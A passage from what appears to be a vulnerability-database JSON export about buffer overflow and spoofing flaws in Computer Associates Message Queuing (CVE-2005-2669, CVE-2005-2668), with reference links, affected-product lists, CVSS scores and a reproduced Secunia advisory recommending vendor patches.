"url": "http://securitytracker.com/alerts/2005/aug/1014768.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014767.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014766.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014765.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014764.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014763.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014761.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014760.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014756.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/408817"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5575/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5573/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-23T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2005-08-23T00:00:00",
"db": "VULHUB",
"id": "VHN-13878"
},
{
"date": "2005-08-22T00:00:00",
"db": "BID",
"id": "14623"
},
{
"date": "2005-08-23T23:30:33",
"db": "PACKETSTORM",
"id": "39503"
},
{
"date": "2005-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"date": "2005-08-23T04:00:00",
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-10-21T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2017-11-21T00:00:00",
"db": "VULHUB",
"id": "VHN-13878"
},
{
"date": "2009-07-12T17:06:00",
"db": "BID",
"id": "14623"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Message Queuing software vulnerable to buffer overflows",
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.6
}
}
VAR-200508-0051
Vulnerability from variot - Updated: 2025-04-03 22:23Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors. This may allow an attacker to escalate their privileges to SYSTEM level. CA Unicenter Management Portal provides access to enterprise management information and various Unicenter management solutions such as personalized WEB interface.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: CA Various Products Message Queuing Vulnerabilities
SECUNIA ADVISORY ID: SA16513
VERIFY ADVISORY: http://secunia.com/advisories/16513/
CRITICAL: Moderately critical
IMPACT: Spoofing, DoS, System access
WHERE:
From local network
SOFTWARE: CA Unicenter TNG 2.x http://secunia.com/product/3206/ CA Unicenter Software Delivery 4.x http://secunia.com/product/5597/ CA Unicenter Software Delivery 3.x http://secunia.com/product/5596/ CA Unicenter Service Level Management 3.x http://secunia.com/product/5595/ CA Unicenter Remote Control 6.x http://secunia.com/product/2622/ CA Unicenter Performance Management for OpenVMS 2.x http://secunia.com/product/5573/ CA Unicenter Network and Systems Management (NSM) Wireless Network Management Option 3.x http://secunia.com/product/5594/ CA Unicenter Network and Systems Management (NSM) 3.x http://secunia.com/product/1683/ CA Unicenter Management for WebSphere MQ 3.x http://secunia.com/product/5590/ CA Unicenter Management for Web Servers 5.x http://secunia.com/product/5593/ CA Unicenter Management for Microsoft Exchange 4.x http://secunia.com/product/5591/ CA Unicenter Management for Lotus Notes/Domino 4.x http://secunia.com/product/5592/ CA Unicenter Jasmine 3.x http://secunia.com/product/5589/ CA Unicenter Enterprise Job Manager 1.x http://secunia.com/product/5588/ CA Unicenter Data Transport Option 2.x http://secunia.com/product/5587/ CA Unicenter Asset Management 4.x http://secunia.com/product/1682/ CA Unicenter Asset Management 3.x http://secunia.com/product/5586/ CA Unicenter Application Performance Monitor 3.x http://secunia.com/product/5585/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Admin 2.x http://secunia.com/product/5583/ CA CleverPath Predictive Analysis Server 3.x http://secunia.com/product/5581/ CA CleverPath Predictive Analysis Server 2.x http://secunia.com/product/5580/ CA CleverPath OLAP 5.x http://secunia.com/product/5578/ CA CleverPath Enterprise Content Manager (ECM) 3.x http://secunia.com/product/5579/ CA CleverPath Aion 10.x http://secunia.com/product/5582/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA BrightStor SAN Manager 1.x http://secunia.com/product/5575/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA Advantage Data Transport 3.x http://secunia.com/product/5574/
DESCRIPTION: Some vulnerabilities have been reported in various products within the CA Message Queuing (CAM / CAFT) software, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
1) An unspecified error in the CAM service can be exploited to cause a DoS by sending specially crafted packets to the TCP port.
2) Unspecified boundary errors can be exploited to cause buffer overflows by sending specially crafted packets to the service.
3) An error can be exploited to spoof CAFT and execute arbitrary commands with escalated privileges.
The vulnerabilities affect all versions of the CA Message Queuing software prior to versions 1.07 Build 220_13 and 1.11 Build 29_13.
SOLUTION: Apply patches (see vendor advisory for details).
PROVIDED AND/OR DISCOVERED BY: Reported by vendor.
ORIGINAL ADVISORY: Computer Associates: http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.11"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "adviseit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter performance management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.7"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "computer associates",
"version": null
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.05"
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.07 build 220_13 before"
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.11 build 29_13 before"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter performance management for openvms sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.9"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.7"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.05"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor san manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates adviseit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cam build 29 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam build 220 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:messaging",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The discoverer of this vulnerability is currently unknown. The vendor disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "14622"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2668",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2005-2668",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-13877",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-2668",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#619988",
"trust": 0.8,
"value": "13.13"
},
{
"author": "NVD",
"id": "CVE-2005-2668",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-250",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-13877",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
